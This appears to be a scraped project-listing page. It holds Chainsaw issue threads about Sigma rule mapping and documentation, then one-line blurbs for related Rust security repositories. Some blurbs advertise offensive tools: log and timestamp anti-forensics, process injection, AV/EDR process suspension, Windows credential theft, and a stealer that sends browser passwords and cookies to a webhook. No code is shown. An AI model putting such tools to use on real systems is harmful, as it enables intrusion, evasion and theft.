    I think the problem is that the category in question (file_block) is not mapped to anything - where and how can I define this? In this example, the category should be file_block iff "provider_name": "Microsoft-Windows-Sysmon" and event_id: 27, which would clearly identify the category.

    I have a similar problem for several other rules. Am I perhaps misunderstanding how certain things work?

    Any help on this would be much appreciated :)

    enhancement 
    opened by Maspital 12
  • Count column

    Count column

    The behavior of Chainsaw does not work as I thought. I assumed the output column 'count' represents the number of occurrences of that specific event, but based on my EVTX files, that does not appear correct. So what does the 'column' mean?

    Clipboard04

    question 
    opened by mkwired 1
  • Documentation or guidance on expanding Chainsaw's functionality

    Documentation or guidance on expanding Chainsaw's functionality

    Hello,

    Would it be possible for some documentation or guidance on how to expand the functionality of Chainsaw using sigma rules and chainsaw's mapping file?

    I've spoken with a number of people in the DFIR community who would love to be able to contribute and build on what is already an amazing tool but have struggled to understand how to write new rules and then map it to Chainsaw's output (myself included!)

    I'd be more than happy to collate some ideas for detection rules if that would help the process in anyway.

    Any help, support or resource you can offer would be greatly appreciated.

    Many thanks

    Tom

    documentation 
    opened by tomnewman86 15
Releases(v2.3.0)
Owner
F-Secure Countercept
F-Secure Countercept
Rslide - A web service that allows you to move through multiple html pages in the browser like a slide, even without focusing on the app console or the browser. Currently only supports Windows.

rslide rslide is a web service that allows you to move through multiple html pages in the browser like a slide, even without focusing on the app conso

Jason Dongheng Lee 3 Jan 1, 2022
Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps. 👻🐚

moonwalk Cover your tracks during Linux Exploitation / Penetration Testing by leaving zero traces on system logs and filesystem timestamps. ?? Table o

Mufeed VH 1.1k Jan 6, 2023
A simple scanner that loops through ips and checks if a minecraft server is running on port 25565

scanolotl Scanolotl is a simple scanner that loops through ips and checks if a minecraft server is running on port 25565. Scanolotl can also preform a

JustFr33z 3 Jul 28, 2022
Security advisory database for Rust crates published through crates.io

RustSec Advisory Database The RustSec Advisory Database is a repository of security advisories filed against Rust crates published via https://crates.

RustSec 682 Jan 1, 2023
Process injection through entry points hijacking.

EPI EPI (Entry Point Injection) is a tool that leverages a new threadless process injection technique that relies on hijacking loaded dll's entry poin

Kurosh Dabbagh Escalante 208 Jun 16, 2023
Advanced Fuzzing Library - Slot your Fuzzer together in Rust! Scales across cores and machines. For Windows, Android, MacOS, Linux, no_std, ...

LibAFL, the fuzzer library. Advanced Fuzzing Library - Slot your own fuzzers together and extend their features using Rust. LibAFL is written and main

Advanced Fuzzing League ++ 1.2k Jan 6, 2023
A tiny program that locates and extracts public save files from Windows to your local directory!

Save Game Extractor | Download Save Game Extractor is a tool that automatically locates and copies save files for Windows games in public directories.

popcar2 6 Dec 23, 2021
A Rust program to control bias lighting on Linux and Windows.

displaylight_rs This Rust workspace is a rewrite of my DisplayLight project. It colors leds mounted behind the monitor with the colors shown on the di

Ivor Wanders 2 Sep 25, 2022
Checks whether the process is running as root/sudo/admin permission in Windows and Unix systems

Is_sudo Checks if program is running as sudo in unix systems, or using admin permission in windows. Usage use is_sudo::check; use is_sudo::RunningAs;

Spark 2 Aug 12, 2022
Single stub direct and indirect syscalling with runtime SSN resolving for windows.

RUST_SYSCALLS Single stub direct and indirect syscalling with runtime SSN resolving for windows. Features: One single line for all your syscalls Funct

Yxel 81 Dec 4, 2022
Attempts to suspend all known AV/EDRs processes on Windows using syscalls and the undocumented NtSuspendProcess API. Made with <3 for pentesters. Written in Rust.

Ronflex Attempts to suspend all known AV/EDRs processes on Windows using syscalls and the undocumented NtSuspendProcess API. Made with <3 for penteste

null 5 Apr 17, 2023
MimiRust - Hacking the Windows operating system to hand us the keys to the kingdom with Rust.

MimiRust - Hacking the Windows operating system to hand us the keys to the kingdom with Rust. MimiRust is a program based on the wdigest attack vector

Thotty 0 Nov 29, 2022
Binary coverage tool without binary modification for Windows

Summary Mesos is a tool to gather binary code coverage on all user-land Windows targets without need for source or recompilation. It also provides an

null 381 Dec 22, 2022
Memory hacking library for windows.

Memory hacking library for windows.

sy1ntexx 40 Jan 3, 2023
A small oscilloscope UI for the Owon HDS series portable oscilloscopes (Windows 10+, x86_64 only)

owowon - A small oscilloscope UI for the Owon HDS series portable oscilloscopes Screenshot of the program, reading a 10 MHz sinewave generated by the

Dennis Duda 7 Jan 22, 2023
Kepler is a vulnerability database and lookup store and API currently utilising National Vulnerability Database and NPM Advisories as data sources

Kepler — Kepler is a vulnerability database and lookup store and API currently utilising National Vulnerability Database and NPM Advisories as data so

Exein.io 101 Nov 12, 2022
Steals browser passwords and cookies and sends to webhook.

Browser-Stealer Steals browser passwords and cookies and sends to webhook. Donating Educational Purposes Only This code is made so you can learn from

RadonCoding 3 Sep 27, 2021
Xori is an automation-ready disassembly and static analysis library for PE32, 32+ and shellcode

Xori - Custom disassembly framework Xori is an automation-ready disassembly and static analysis library that consumes shellcode or PE binaries and pro

ENDGAME 712 Nov 28, 2022
🕵️‍♀️ Find, locate, and query files for ops and security experts ⚡️⚡️⚡️

Recon Find, locate, and query files for ops and security experts Key Features • How To Use • Download • Contributing • License Key Features Query with

Rusty Ferris Club 11 Dec 16, 2022